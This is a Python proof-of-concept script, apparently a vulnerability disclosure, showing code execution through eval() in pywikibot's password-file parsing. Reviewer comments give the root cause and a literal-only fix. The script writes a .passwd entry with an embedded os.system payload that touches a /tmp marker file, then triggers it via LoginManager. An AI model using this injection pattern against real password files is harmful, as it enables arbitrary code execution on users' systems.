Created
November 25, 2025 13:29
RCE via eval() in pywikibot during password parsing
#!/usr/bin/env python3
# Reviewer summary (defensive reading of this demonstration):
#   * Root cause, per the comments on this page: readPassword() hands
#     password-file entries to eval(), so the file is treated as code
#     rather than as data.
#   * Precondition: control over the password file's contents. Here the
#     same user who runs the script writes the file, so what is shown is
#     "a data file executes code"; it matters wherever that file can be
#     written or supplied by someone other than the account owner.
#   * Mitigation: parse entries with a literal-only parser
#     (ast.literal_eval accepts tuples of string literals and rejects
#     calls); any non-literal entry form the file format allows would need
#     explicit handling. Until then, audit password files for entries that
#     are not plain tuples of quoted strings and keep them owner-only.
import os
import uuid
from pathlib import Path

# Run from the directory that contains this script.
# NOTE(review): presumably so the library resolves its configuration and
# the '.passwd' file from here; not shown on this page, confirm.
poc_dir = Path(__file__).parent
os.chdir(poc_dir)

# Per-run marker name: 'pwb_rce_' + first 8 hex digits of a random UUID +
# '.txt'. Whether this file exists under /tmp is what gets checked at the
# end of the script.
exploit_filename = 'pwb_rce_' + uuid.uuid4().hex[:8] + '.txt'
exploit_file = Path('/tmp') / exploit_filename

# Password file body. The first entry is an ordinary tuple of string
# literals. The fourth element of the second entry is an expression, not a
# string: if the reader evaluates the line as Python, that expression runs
# and creates the marker file.
passwd_content = f"""# Normal password entry
('testuser', 'testpass')
# Malicious code injection
('en', 'wikipedia', 'victim', __import__('os').system('touch /tmp/{exploit_filename} && echo "RCE SUCCESSFUL" > /tmp/{exploit_filename}'))
"""

# Note: this overwrites any '.passwd' already present next to the script.
passwd_path = poc_dir / '.passwd'
passwd_path.write_text(passwd_content, encoding='utf-8')
# Owner read/write only.
# NOTE(review): presumably needed because the library checks the file mode
# before reading the file; confirm against the library.
passwd_path.chmod(0o600)

# Imported only after the password file is in place.
# NOTE(review): the original comment here says the import itself triggers
# password-file parsing, while the later comment in this script attributes
# it to LoginManager(); the latter reads as the actual trigger, so confirm.
import pywikibot
from pywikibot.login import LoginManager
# Stand-in site object so the demonstration makes no network calls.
class FakeSite:
    """Minimal site double exposing only ``code`` and ``family.name``."""

    def __init__(self):
        # Throwaway class whose single attribute is name == 'wikipedia';
        # a fresh class and instance are built for every FakeSite.
        family_cls = type('FakeFamily', (), {'name': 'wikipedia'})
        self.family = family_cls()
        self.code = 'en'
# Swap pywikibot.Site for a factory that ignores its arguments and returns
# a FakeSite, so no real site object is constructed.
def _fake_site(*args, **kwargs):
    return FakeSite()


pywikibot.Site = _fake_site

# Per the original author, constructing LoginManager reaches readPassword(),
# which uses eval() on line 255 (file and version are not stated on this
# page). That eval() is where the password-file entries are evaluated.
LoginManager()

# The marker file can only exist if the expression embedded in the password
# file was executed during the call above.
# Housekeeping: the script removes neither '.passwd' nor the marker file;
# delete both after a test run.
if not exploit_file.exists():
    print("[*] Exploit file not found")
else:
    print("[!] RCE SUCCESSFUL!")
    print(f"[!] File created: {exploit_file}")
    print(f"[!] Contents: {exploit_file.read_text()}")